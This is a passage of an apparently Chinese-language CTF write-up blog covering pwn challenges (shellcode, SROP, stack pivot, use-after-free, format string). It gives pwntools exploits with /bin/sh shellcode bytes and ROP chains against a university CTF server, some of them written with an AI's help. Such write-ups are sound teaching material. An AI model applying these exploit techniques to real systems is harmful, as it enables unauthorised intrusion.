p.interactive()<\/code><\/pre>\n\n\n\n[PWN]shellcode \ud83d\udc1a<\/h4>\n\n\n\n
\u539f\u672c\u4ee5\u4e3a\u8fd8\u6709\u4e9b\u4ec0\u4e48\u8981\u6ce8\u610f\u7684\u70b9\uff0c\u7ed3\u679c\u771f\u7684\u4f20\u4e0a\u5c31\u7ed9<\/p>\n\n\n\n
\u968f\u4fbf\u627e\u4e2a64\u4f4d\u77edshellcode\u8fdb\u53bb\u51d1\u6570\u4e86<\/p>\n\n\n\n
from pwn import *
context.log_level = 'debug'
p = remote(\"ctf.ctbu.edu.cn\",33019)
payload = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'
p.sendline(payload)
p.interactive()<\/code><\/pre>\n\n\n\n[PWN]srop \ud83e\uddd9\u200d\u2642\ufe0f<\/h4>\n\n\n\n
\u770b\u4e86\u5feb\u63a5\u8fd124\u5c0f\u65f6\u7684\u9898\u76ee<\/p>\n\n\n\n
\u4e0d\u80fd\u8bf4\u60c5\u6709\u72ec\u949f\uff0c\u53ea\u80fd\u8bf4\u81ea\u5df1\u8822\u5f97\u6ca1\u8fb9<\/p>\n\n\n\n
\u539f\u7406\u590d\u8ff0\u8d77\u6765\u597d\u9ebb\u70e6\uff08\uff09<\/p>\n\n\n\n
\u5185\u6838\u5c42\u548c\u7528\u6237\u5c42\u5565\u7684\uff0c\u53cd\u6b63\u5c31\u662f\u6682\u65f6kill\u8fdb\u7a0b\u7136\u540e\u4fdd\u5b58\u4e00\u4efd\uff0c\u4e4b\u540e\u518d\u590d\u539f\u561b<\/p>\n\n\n\n
\u8fd9\u4e2a\u8fc7\u7a0b\u53ef\u4ee5\u76f4\u63a5\u4f2a\u9020\uff0c\u8ba9rax = 15 \uff0csyscall\u7684\u60c5\u51b5\u4e0b\u4f1a\u76f4\u63a5\u7b49\u4ef7\u4e8e\u4e00\u4e2asigreturn<\/p>\n\n\n\n
\u7136\u540e\u4f2a\u9020\u4e00\u4e0b\u5404\u5bc4\u5b58\u5668\u7684\u503c\u5c31\u597d\u4e86<\/p>\n\n\n\n
\u7136\u540e\/bin\/sh\u5728data\u6bb5\u662f\u76f4\u63a5\u5c31\u6709\uff0c\u6ca1\u5fc5\u8981\u50cf\u7f51\u4e0a\u90a3\u4e9b\u5947\u5947\u602a\u602a\u7684\u590d\u6742\u4f8b\u9898\u4e00\u6837\u518d\u5f80bss\u6bb5\u5148\u5199\u4e2a\/bin\/sh\u8fdb\u53bb<\/p>\n\n\n\n
\uff08\u8bdd\u8bf4\u80fd\u4e0d\u80fd\u5199\u554a\uff0c\u6211\u8fd8\u6ca1\u8bd5\u8fc7\uff0c\u4e4b\u524d\u5fd8\u4e86\u90a38\u5b57\u8282\u7684rbp\uff0c\u91cd\u65b0\u5f80bss\u5199\/bin\/sh\u4e5f\u8bd5\u8fc7\uff0c\u4f46\u662f\u80af\u5b9a\u6ca1\u901a\uff0c\u4e4b\u540e\u8bd5\u8bd5\u5199\u4e2a\u8fdb\u53bb\u80fd\u4e0d\u80fd\u73a9\uff09<\/p>\n\n\n\n
\uff08\u4e00\u5f00\u59cb\u6211\u8fd8\u5728IDA\u5230\u5904\u7ffbsyscall\u5728\u54ea\uff0c\u540e\u9762\u53d1\u73b0ROPgadget\u91cc\u9762\u5de8\u597d\u627e\uff0c\u4e5f\u662f\u8111\u762b\u5fd8\u4e86ROPgadget\u4e5f\u80fd\u627e\u5230syscall\u4e86\uff09<\/p>\n\n\n\n
from pwn import *
\u200b
context.arch = 'amd64'
context.log_level = 'debug'
\u200b
# \u5730\u5740\u4fe1\u606f
bin_sh_addr = 0x404010
syscall_addr = 0x40110d
gift_addr = 0x401113
\u200b
# \u6784\u9020SROP Frame
frame = SigreturnFrame()
frame.rax = 59 # execve\u7cfb\u7edf\u8c03\u7528\u53f7
frame.rdi = bin_sh_addr # \/bin\/sh\u7684\u5730\u5740
frame.rsi = 0 # \u53c2\u65702
frame.rdx = 0 # \u53c2\u65703
frame.rip = syscall_addr # \u6267\u884csyscall\u4ee5\u89e6\u53d1execve
\u200b
\u200b
# \u6784\u9020payload
payload = b'A' * 40 # \u586b\u5145\u7f13\u51b2\u533a\u53caRBP
payload += p64(gift_addr) # \u8986\u76d6\u8fd4\u56de\u5730\u5740\u4e3agift\u51fd\u6570
payload += p64(syscall_addr) # gift\u8fd4\u56de\u540e\u6267\u884csyscall
payload += bytes(frame) # \u6dfb\u52a0\u4f2a\u9020\u7684Signal Frame
\u200b
# \u53d1\u9001payload\u5e76\u83b7\u53d6shell
r = remote('ctf.ctbu.edu.cn', 33204)
r.send(payload)
r.interactive()<\/code><\/pre>\n\n\n\n[PWN]ez_stack \ud83d\udc19<\/h4>\n\n\n\n
\u6808\u8fc1\u79fb\uff08\u7b2c\u4e8c\u6b21\u73a9\uff09<\/p>\n\n\n\n
main\u51fd\u6570\u8fdb\u53bb\u5c31\u4fe9\u51fd\u6570<\/p>\n\n\n\n
title\u4e0d\u7ba1\uff0cvuln\u770b\u770b<\/p>\n\n\n\n
__int64 vuln()
{
_BYTE buf[48]; \/\/ [rsp+0h] [rbp-30h] BYREF
\u200b
puts(\"What's your name?\");
read(0, &name, 0x100uLL);
puts(\"Ok! Just do it!\");
read(0, buf, 0x38uLL);
return 0LL;
}<\/code><\/pre>\n\n\n\nread\u51fd\u6570\u8f93\u5165\u8fdb\u53bb\uff0cbuf\u5c31\u5403\u6389\u4e860x30\uff0c\u5c31\u53ea\u80fd\u8986\u76d60x8\u5b57\u8282\u5185\u5bb9<\/p>\n\n\n\n
\u4e0d\u591f\u53ea\u80fd\u5916\u501f\u4e86<\/p>\n\n\n\n
\u53ea\u80fd\u5230\u5904\u627e\u54ea\u80fd\u5199\u70b9\u4e1c\u897f\u8fdb\u53bb<\/p>\n\n\n\n
bss\u6bb5\u53ef\u8bfb\u53ef\u5199\uff0c\u4e00\u7ffb\u8fd8\u771f\u6709\u8bf4\u6cd5<\/p>\n\n\n\n
.bss:0000000000404080 public name
.bss:0000000000404080 name db ? ; ; DATA XREF: vuln+20\u2191o<\/pre>\n\n\n\n\u90a3\u601d\u8def\u5c31\u662f\u901a\u8fc7\u6ea2\u51fa\uff0c\u5c06RBP<\/code>\u8986\u76d6\u4e3aname<\/code>\u7684\u5730\u5740\uff080x404080<\/code>\uff09<\/p>\n\n\n\n\u5c06\u8fd4\u56de\u5730\u5740\u8986\u76d6\u4e3aret<\/code>\u6307\u4ee4\uff080x40101a<\/code>\uff09\uff0c\u7528\u4e8e\u6808\u5bf9\u9f50<\/p>\n\n\n\nname<\/code>\u91cc\u9762\u5c31\u968f\u4fbf\u5199\u4e86<\/p>\n\n\n\n\/bin\/sh<\/code>\u53c8\u5728\u9644\u4ef6\u4e2d\u80fd\u627e\u5230<\/p>\n\n\n\n\u76f4\u63a5\u5f00\u4e2aexecve<\/code>\u7136\u540erdi<\/code>\u6307\u5411\/bin\/sh<\/code>\u76f4\u63a5\u5c31\u5b8c\u6210\u63d0\u6743\u4e86\uff08\uff09<\/p>\n\n\n\n\u81f3\u4e8eexecve\uff0c\u8fd9\u4e2a\u597d\u641e\uff0cROPgadget\u4e00\u7ffb\u5c31\u627e\u5230\u8fd9\u51e0\u4e2a\u80fd\u7528\u7684pop<\/p>\n\n\n\n
pop\u4f20\u53c2\u8fdb\u5bf9\u5e94\u5bc4\u5b58\u5668\u5b8c\u6210\u7cfb\u7edf\u8c03\u7528<\/p>\n\n\n\n
\u76f4\u63a5\u5c31get shell<\/p>\n\n\n\n
from pwn import *
\u200b
context(arch='amd64', os='linux', log_level='debug')
\u200b
r = remote('ctf.ctbu.edu.cn', 33301)
\u200b
name_addr = 0x404080
ret_addr = 0x40101a
pop_rdi = 0x401180
pop_rsi = 0x401182
pop_rdx = 0x40117a
pop_rax_syscall = 0x40117d
bin_sh = 0x404028
\u200b
\u200b
payload1 = flat([
0,
pop_rdi, bin_sh,
pop_rsi, 0,
pop_rdx, 0,
pop_rax_syscall, 59
])
\u200b
\u200b
payload2 = b'A'*48 + p64(name_addr) + p64(ret_addr)
\u200b
\u200b
\u200b
\u200b
r.sendlineafter(b\"What's your name?\\n\", payload1)
r.sendlineafter(b\"Ok! Just do it!\\n\", payload2)
\u200b
r.interactive()<\/code><\/pre>\n\n\n\n[PWN]uaf \ud83d\udc7b<\/h4>\n\n\n\n
emmm\uff0c\u8fd9\u9898\u6211\u4e0d\u4f1a\u7684\uff08\uff09<\/p>\n\n\n\n
\u539f\u672c\u53ea\u662f\u968f\u624b\u770b\u770b\u80fd\u4e0d\u80fd\u7529\u7ed9AI\u7ed9\u6211\u7406\u4e2a\u5806\u9898\u7684\u903b\u8f91\u51fa\u6765\u6211\u518d\u6162\u6162\u586b\u677f\u5b50\u7684<\/p>\n\n\n\n
\u7ed3\u679c\u4fe1\u606f\u7ed9\u591f\u4e86\u5b83\u76f4\u63a5\u5c31\u7ed9\u6211\u641e\u4e86\u4e2a\u5b8c\u6574exp\u7136\u540e\u8fd8\u51fa\u4e86<\/p>\n\n\n\n
\u7559\u4e2a\u63d0\u95ee\u4fe1\u606f\u5427\uff1a<\/p>\n\n\n\n
\n\u8fd9\u662f\u4e00\u9053ctf pwn\u6311\u6218\u8d5b\u9898 main\u51fd\u6570\u5982\u4e0b\uff1a \/\/ local variable allocation has failed, the output may be wrong! int _fastcall main(int argc, const char argv, const char <\/strong>envp) { while ( 1 ) { print_menu(*(<\/em>QWORD *)&argc, argv, envp); switch ( (unsigned int)get_num() ) { case 1u: adopt_dog(); break; case 2u: Release_dog(); break; case 3u: edit_dog(); break; case 4u: Check_ans(); case 5u: puts(“Goodbye, you will never find a safer program!\\n”); exit(0); default: *(_QWORD *)&argc = “Invalid option!\\n”; puts(“Invalid option!\\n”); break; } } } main\u51fd\u6570\u5730\u5740\uff1amain .text 000000000000183D \u8fd9\u662f\u4e2a\u5e38\u89c4\u7684\u83dc\u5355main\u51fd\u6570 \u9009\u98791\u7684adopt_dog\u51fd\u6570\u5185\u5bb9\u5982\u4e0b\uff1a int adopt_dog() { int v1; \/\/ ebx int num; \/\/ [rsp+4h] [rbp-1Ch] size_t v3; \/\/ [rsp+8h] [rbp-18h]<\/p>\n\n\n\nif ( cur_alloc_index > 2 ) return puts(“Too many dogs!”); puts(“What is the name of the dog?”); fgets((char *)&dog_array + 56 * cur_alloc_index, 32, stdin); v3 = strlen((const char *)&dog_array + 56 * cur_alloc_index); if ( v3 && *((BYTE *)&dog_array + 56 * cur_alloc_index + v3 – 1) == 10 ) *((<\/em>BYTE *)&dog_array + 56 * cur_alloc_index + v3 – 1) = 0; puts(“How much space do you need to describe this dog?”); num = get_num(); v1 = cur_alloc_index; *((QWORD *)&unk_4088 + 7 * v1) = malloc(num); *((<\/em>DWORD *)&unk_4080 + 14 * cur_alloc_index) = num; dword_4090[14 * cur_alloc_index] = -559038737; if ( !*((_QWORD *)&unk_4088 + 7 * cur_alloc_index) ) { puts(“Alloc call failed”); exit(1); } puts(“Successful adoption!”); return ++cur_alloc_index; } \u9009\u98792\uff1a int Release_dog() { int num; \/\/ [rsp+Ch] [rbp-4h]<\/p>\n\n\n\nputs(“Which dog would you like to release?”); num = get_num(); if ( num > 2 ) return puts(“Provided index out of bounds, this is not possible!”); if ( dword_4090[14 * num] != -559038737 ) return puts(“Provided index hasn’t yet been allocated, can’t reallocate!”); free(*((void **)&unk_4088 + 7 * num)); return printf(“%s has been released! It will leave you forever.\\n”, (const char *)&dog_array + 56 * num); } \u9009\u98793\uff1a int edit_dog() { int num; \/\/ [rsp+Ch] [rbp-4h]<\/p>\n\n\n\n
puts(“Which dog’s info do you want to edit?”); num = get_num(); if ( num > 2 ) return puts(“Provided index out of bounds, this is not possible!”); if ( dword_4090[14 * num] != -559038737 ) return puts(“Provided index hasn’t yet been allocated, can’t edit!”); puts(“Please edit its information.”); return read(0, *((void **)&unk_4088 + 7 * num), *((unsigned int *)&unk_4080 + 14 * num)); } \u9009\u98794\uff1a void __noreturn Check_ans() { const char *v0; \/\/ rdi<\/p>\n\n\n\n
v0 = (const char *)malloc(0x48uLL); if ( !strcmp(v0, “ez uaf”) ) win(); puts(“Hah, you missed your shot!”); exit(0); } \u9009\u98794\u4e2d\u7684win\u51fd\u6570\uff1a void __noreturn win() { printf(“The flag is: “); system(“cat flag”); exit(1); } \u8fd9\u662f\u4e00\u9053pwn\u65b9\u5411\u8003\u5bdfUAF\u7684\u9898\uff0c\u5404\u51fd\u6570\u7684\u5730\u5740\u5982\u4e0b\uff1a adopt_dog .text 0000000000001413 Release_dog .text 0000000000001625 edit_dog .text 0000000000001701 Check_ans .text 00000000000017E2 win .text 00000000000013DE \u73b0\u5728\u8003\u8651\u5982\u4f55\u6784\u9020exp\uff0c\u6765\u6253\u901a\u8fd9\u9898 \u76ee\u6807\u670d\u52a1\u5668\uff1actf.ctbu.edu.cn:33210 \uff0c\u7528pwn\u5e93\u7684remote\u65b9\u6cd5\u8fdb\u884c\u8fde\u63a5<\/p>\n\n\n\n
int print_menu() { puts(“[1] Adopt a dog”); puts(“[2] Release a dog”); puts(“[3] Edit dog Info”); puts(“[4] Check the answer”); puts(“[5] Exit”); return printf(“\\n > “); } \u8fdb\u884c\u4ea4\u4e92\u65f6\uff0c\u4f1a\u5148\u8fdb\u5165print_menu\u51fd\u6570\uff0c\u4e5f\u5c31\u662f\u4e0a\u9762\u7684\u4ee3\u7801\u51fd\u6570 \u6839\u636e\u8fd9\u4e2a\u60c5\u51b5\u6539\u5199\u4e00\u4e0bexp\uff0c\u4ee5\u6c42\u9002\u914d<\/p>\n<\/blockquote>\n\n\n\n
from pwn import *
\u200b
context(arch='amd64', os='linux', log_level='debug')
\u200b
p = remote('ctf.ctbu.edu.cn', 33210)
\u200b
def adopt_dog(name, size):
p.sendlineafter(b'> ', b'1') # \u9009\u62e9\u9009\u98791
p.sendlineafter(b'What is the name of the dog?\\n', name)
p.sendlineafter(b'How much space do you need to describe this dog?\\n', str(size).encode())
\u200b
def release_dog(index):
p.sendlineafter(b'> ', b'2') # \u9009\u62e9\u9009\u98792
p.sendlineafter(b'Which dog would you like to release?\\n', str(index).encode())
\u200b
def edit_dog(index, data):
p.sendlineafter(b'> ', b'3') # \u9009\u62e9\u9009\u98793
p.sendlineafter(b\"Which dog's info do you want to edit?\\n\", str(index).encode())
p.send(data) # \u76f4\u63a5\u53d1\u9001\u6570\u636e\uff08\u65e0\u9700\u6362\u884c\uff09
\u200b
# 1. \u5206\u914d\u5e76\u91ca\u653e0x48\u7684\u5757
adopt_dog(b'dummy', 0x48) # \u5206\u914d\u7d22\u5f150\uff0c\u5927\u5c0f0x48
release_dog(0) # \u91ca\u653e\u7d22\u5f150\uff08\u89e6\u53d1UAF\uff09
\u200b
# 2. \u7be1\u6539\u5df2\u91ca\u653e\u5757\u7684\u5185\u5bb9\u4e3a\"ez uaf\"
edit_dog(0, b'ez uaf\\x00') # \u901a\u8fc7UAF\u5199\u5165\u76ee\u6807\u5b57\u7b26\u4e32
\u200b
# 3. \u89e6\u53d1Check_ans\uff0c\u6b64\u65f6malloc(0x48)\u4f1a\u590d\u7528\u88ab\u7be1\u6539\u7684\u5757
p.sendlineafter(b'> ', b'4') # \u9009\u62e9\u9009\u98794
\u200b
# 4. \u83b7\u53d6flag
p.interactive()<\/code><\/pre>\n\n\n\n\uff08\u6821\u8d5bwp\u5c31\u6682\u65f6\u4e0d\u7406\u4f1a\u539f\u7406\u4e86\uff0c\u6253\u5b8c\u518d\u91cd\u65b0\u590d\u73b0\u73a9\u73a9\uff0c\u73a9\u660e\u767d\u4e86\u518d\u91cd\u65b0\u8d34\u4e00\u7bc7UAF\uff09<\/p>\n\n\n\n
[PWN]just_one \ud83c\udfaf<\/h4>\n\n\n\n
\u4fdd\u62a4\u5168\u5f00\uff0c\u597d\u75db\u82e6\uff08\uff09<\/p>\n\n\n\n
\u660e\u8bf4\u4e86fmt<\/p>\n\n\n\n
\u53d1\u73b0AAAA%p-%p-%p-%p-%p-%p-%p-%p-%p\u8fd9\u79cd\u4ea4\u4e92\uff0c\u5c45\u7136\u4f1a\u76f4\u63a5\u9000\u51fa\uff08\u5dee\u70b9\u56e0\u4e3a\u8fd9\u4e2a\u95ee\u9898\u76f4\u63a5\u529d\u9000\u4e86\uff09<\/p>\n\n\n\n
\u540e\u9762\u60f3\u8d77\u6765\u8fd8\u53ef\u4ee5\u6362AAAA%x$p\u6765\u627e\uff08\u5f53\u65f6\u60f3\u77405~15\u4e8c\u5206\u6cd5\u627e\uff0c\u7ed3\u679c\u5c45\u7136\u662f6\uff0c\u8fd8\u4e0d\u5982\u76f4\u63a5\u6328\u7740\u731c\uff09<\/p>\n\n\n\n
\u5728AAAA%6$p\u8fdb\u884c\u4ea4\u4e92\u7684\u65f6\u5019\uff0c\u62ff\u5230\u4e86<\/p>\n\n\n\n
AAAA0x7024362541414141<\/code><\/code><\/pre>\n\n\n\n\u8fd9\u4e00\u8fde\u4e32\u768441\uff0c\u5bf9\u5473\u4e86<\/p>\n\n\n\n
\u9501\u5b9a\u7b2c\u516d\u4f4d\u4e86<\/p>\n\n\n\n
unsigned __int64 vuln()
{
_QWORD buf[513]; \/\/ [rsp+0h] [rbp-1010h] BYREF
unsigned __int64 v2; \/\/ [rsp+1008h] [rbp-8h]
\u200b
v2 = __readfsqword(0x28u);
memset(buf, 0, 0x1000uLL);
buf[100] = 3735928558LL;
buf[200] = &buf[100];
puts(\"This fmt is not difficult, but it will test your basic skills.\");
puts(\"Come on, you can do it.\\n\");
puts(\"Show me your payload\");
printf(\"> \");
read(0, buf, 0x10uLL);
printf((const char *)buf);
if ( buf[100] == 3735928559LL )
backdoor();
else
puts(\"Bye bye~\");
return v2 - __readfsqword(0x28u);
}<\/code><\/pre>\n\n\n\nbuf[100] = 3735928558LL;<\/code><\/p>\n\n\n\n\u6362\u4e2a\u5199\u6cd5\u5c310xdeadbeee<\/code>\u561b<\/p>\n\n\n\n\u60f3\u8fdbbackdoor\u5c31\u5fc5\u987b\u8981\u52a01<\/p>\n\n\n\n
if ( buf[100] == 3735928559LL )
backdoor();<\/pre>\n\n\n\n\u6240\u4ee50xdeadbeee<\/code> —-> 0xdeadbeef<\/code>\u624d\u884c<\/p>\n\n\n\n\u89c2\u5bdf\u5dee\u5f02<\/strong>\uff1a0xdeadbeee<\/code> \u548c 0xdeadbeef<\/code> \u7684\u552f\u4e00\u533a\u522b\u662f \u6700\u4f4e\u5b57\u8282<\/strong>\uff1a<\/p>\n\n\n\n0xdeadbeee<\/code> \u2192 \u6700\u4f4e\u5b57\u8282\u4e3a 0xee<\/code>\uff08\u5341\u8fdb\u5236 238<\/code>\uff09\u3002<\/p>\n\n\n\n0xdeadbeef<\/code> \u2192 \u6700\u4f4e\u5b57\u8282\u4e3a 0xef<\/code>\uff08\u5341\u8fdb\u5236 239<\/code>\uff09\u3002<\/p>\n\n\n\n\u8981\u6539\u4e00\u5b57\u8282\uff0c\u6240\u4ee5\u9650\u5236\u633a\u5927\u7684\uff08\uff09<\/p>\n\n\n\n
\u6240\u4ee5\u5f97\u7528%hhn<\/p>\n\n\n\n
%hhn<\/code> \u7684\u4f5c\u7528<\/strong>\uff1a\u5411\u76ee\u6807\u5730\u5740\u5199\u5165 1 \u5b57\u8282<\/strong>\uff08\u5373\u5df2\u8f93\u51fa\u5b57\u7b26\u6570\u7684\u4f4e 8 \u4f4d\uff09<\/p>\n\n\n\n%n<\/code> \u7684\u4f5c\u7528<\/strong>\uff1a\u5411\u76ee\u6807\u5730\u5740\u5199\u5165 int<\/code> \u6216 long<\/code> \u7c7b\u578b\uff084 \u6216 8 \u5b57\u8282\uff09\uff0c\u8fd9\u4f1a\u8986\u76d6\u66f4\u591a\u5185\u5b58\u533a\u57df<\/p>\n\n\n\nread(0, buf, 0x10uLL);<\/pre>\n\n\n\n\u4e0a\u9762\u4e5f\u662f\u9650\u5236\u7528%hhn\u7684\u539f\u56e0\uff0c\u6bd5\u7adf\u8fd9\u6837\u624d\u80fd\u5c3d\u53ef\u80fd\u7684\u77ed<\/p>\n\n\n\n
\u6b64\u5904\u9700\u6c42<\/strong>\uff1a\u53ea\u9700\u4fee\u6539 1 \u5b57\u8282<\/strong>\uff08\u4ece 0xee<\/code> \u5230 0xef<\/code>\uff09\uff0c\u4f7f\u7528 %hhn<\/code> \u66f4\u7cbe\u51c6\uff0c\u4e14\u907f\u514d\u610f\u5916\u7834\u574f\u5176\u4ed6\u5185\u5b58<\/p>\n\n\n\n\u8981\u5c06 0xee<\/code>\uff08238<\/code>\uff09\u6539\u4e3a 0xef<\/code>\uff08239<\/code>\uff09\uff0c\u9700\u5199\u5165\u7684\u503c\u4e3a 239<\/code><\/p>\n\n\n\n%239c<\/code> \u4f1a\u8f93\u51fa 239<\/code> \u4e2a\u5b57\u7b26\uff08\u586b\u5145\u7a7a\u683c\uff09\uff0c\u4f7f\u603b\u8f93\u51fa\u7684\u5b57\u7b26\u6570\u8fbe\u5230 239<\/code><\/p>\n\n\n\nbuf[200]<\/code>\u7684\u4f4d\u7f6e\u8ba1\u7b97<\/strong>\uff1a<\/p>\n\n\n\nbuf<\/code>\u8d77\u59cb\u4e8e\u7b2c6\u4e2a\u53c2\u6570<\/p>\n\n\n\n\u6bcf\u4e2a_QWORD<\/code>\u5143\u7d20\u53608\u5b57\u8282\uff0c\u76f8\u5f53\u4e8e1\u4e2a\u53c2\u6570\u4f4d\u7f6e<\/p>\n\n\n\nbuf[200]<\/code>\u7684\u504f\u79fb\u4e3a200<\/code>\uff0c\u6545\u5728\u53c2\u6570\u5217\u8868\u4e2d\u7684\u4f4d\u7f6e\u4e3a6 + 200 = 206<\/code><\/p>\n\n\n\n\u5173\u952e\u7ed3\u8bba<\/strong>\uff1abuf[200]<\/code>\u7684\u503c\uff08\u5373buf[100]<\/code>\u7684\u5730\u5740\uff09\u4f4d\u4e8e\u7b2c206\u4e2a\u53c2\u6570<\/strong><\/p>\n\n\n\n%206$hhn<\/code> \u4f1a\u5c06 239<\/code> \u7684\u4f4e 8 \u4f4d\uff08\u5373 0xef<\/code>\uff09\u5199\u5165 buf[100]<\/code> \u7684\u6700\u4f4e\u5b57\u8282<\/p>\n\n\n\n\u90a3\u7ec4\u5408\u4e00\u4e0bpld\u5c31\u51fa\u6765\u4e86\uff08\uff09<\/p>\n\n\n\n
from pwn import *
\u200b
context.log_level = 'debug'
\u200b
# \u8fde\u63a5\u5230\u8fdc\u7a0b\u670d\u52a1\u5668
p = remote('ctf.ctbu.edu.cn', 33229)
\u200b
# \u6784\u9020\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u5c06buf[100]\u7684\u6700\u4f4e\u5b57\u8282\u4fee\u6539\u4e3a0xef\uff08239\uff09
payload = b'%239c%206$hhn'
\u200b
# \u53d1\u9001payload
p.sendlineafter(b'> ', payload)
\u200b
# \u83b7\u53d6\u4ea4\u4e92\u6743\u9650
p.interactive()<\/code><\/pre>\n\n\n\n[PWN]shellcode_pro \ud83e\udd9e<\/h4>\n\n\n\n
\u71c3\u5c3d\u4e86\uff0c\u771f\u4e0d\u4f1a\u8fd9\u4e2a<\/p>\n\n\n\n
\u4ea4\u7ed9AI\uff0c\u5c45\u7136\u8fd8\u662f\u68ad\u51fa\u6765\u4e86<\/p>\n\n\n\n
\u8fd9\u8f88\u5b50\u6700\u76f8\u4fe1deepseek\u7684\u65f6\u523b<\/p>\n\n\n\n
\u8c03\u6559\u8fc7\u7a0b\u633a\u957f\uff08\uff09<\/p>\n\n\n\n
\u5927\u81f4\u8c03\u6559\u601d\u8def\u5c31\u662f\u7ed9\u51fa\u5404\u51fd\u6570\u5730\u5740\u548c\u5185\u5bb9\uff0c\u4ea4\u4ee3\u4ea4\u4e92\u6548\u679c\uff0c\u7136\u540e\u62a5\u9519\u5582\u56de\u53bb\u518d\u62a5\u9519\u518d\u5582<\/p>\n\n\n\n
\u6700\u540e\u770b\u5b83\u8bf4\u6cd5\u662f\u73a9\u7684ORW<\/p>\n\n\n\n
\uff08\u6ca1\u73a9\u8fc7\u8fd9\u4e2a\uff0c\u4e0d\u77e5\u9053\u600e\u4e48\u5224\u65ad\u73a9\u8fd9\u4e2a\u7684\uff0c\u53c8\u662f\u4e00\u9053\u8d5b\u540e\u6162\u6162\u7814\u7a76\u7684\u9898\u76ee\uff09 \u8fd8\u662f\u60ef\u4f8b\u8d34\u51fa\u63d0\u95ee\u8bcd\uff08\u63d0\u95ee\u6bb5\uff09\uff1a<\/p>\n\n\n\n
\u73b0\u5728\u9700\u8981\u4f60\u5e2e\u52a9\u5b8c\u6210\u4e00\u9053pwn\u9898
\u4e3b\u8981\u6253\u901a\u65b9\u6cd5\u662f\u4f20\u5165shellcode
\u6587\u4ef6\u4fdd\u62a4\u60c5\u51b5\uff1a[*] 'C:\\\\Users\\\\26597\\\\Downloads\\\\Compressed\\\\shellcode_pro\\\\shellcode_pro'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No
main\u51fd\u6570\u5730\u5740\uff1a0x1501
int __fastcall main(int argc, const char **argv, const char **envp)
{
unsigned int v4; \/\/ [rsp+Ch] [rbp-1014h]
_BYTE buf[16]; \/\/ [rsp+10h] [rbp-1010h] BYREF
unsigned __int64 v6; \/\/ [rsp+1018h] [rbp-8h]
\u200b
v6 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
title();
puts(\"Your shellcode:\");
v4 = read(0, buf, 0x1000uLL);
setup_shellcode(buf, v4);
return 0;
}
title\u51fd\u6570\u53ea\u662f\u5355\u7eaf\u7684puts\u5185\u5bb9\uff0c\u4ea4\u4e92\u6548\u679c\u662f\uff1a
\u250c\u2500\u2500(kali\u327fkali)-[~]
\u2514\u2500$ nc ctf.ctbu.edu.cn 33243
\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557
\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d
\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557
\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d
\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d
\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557
\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557
\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551
\u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551
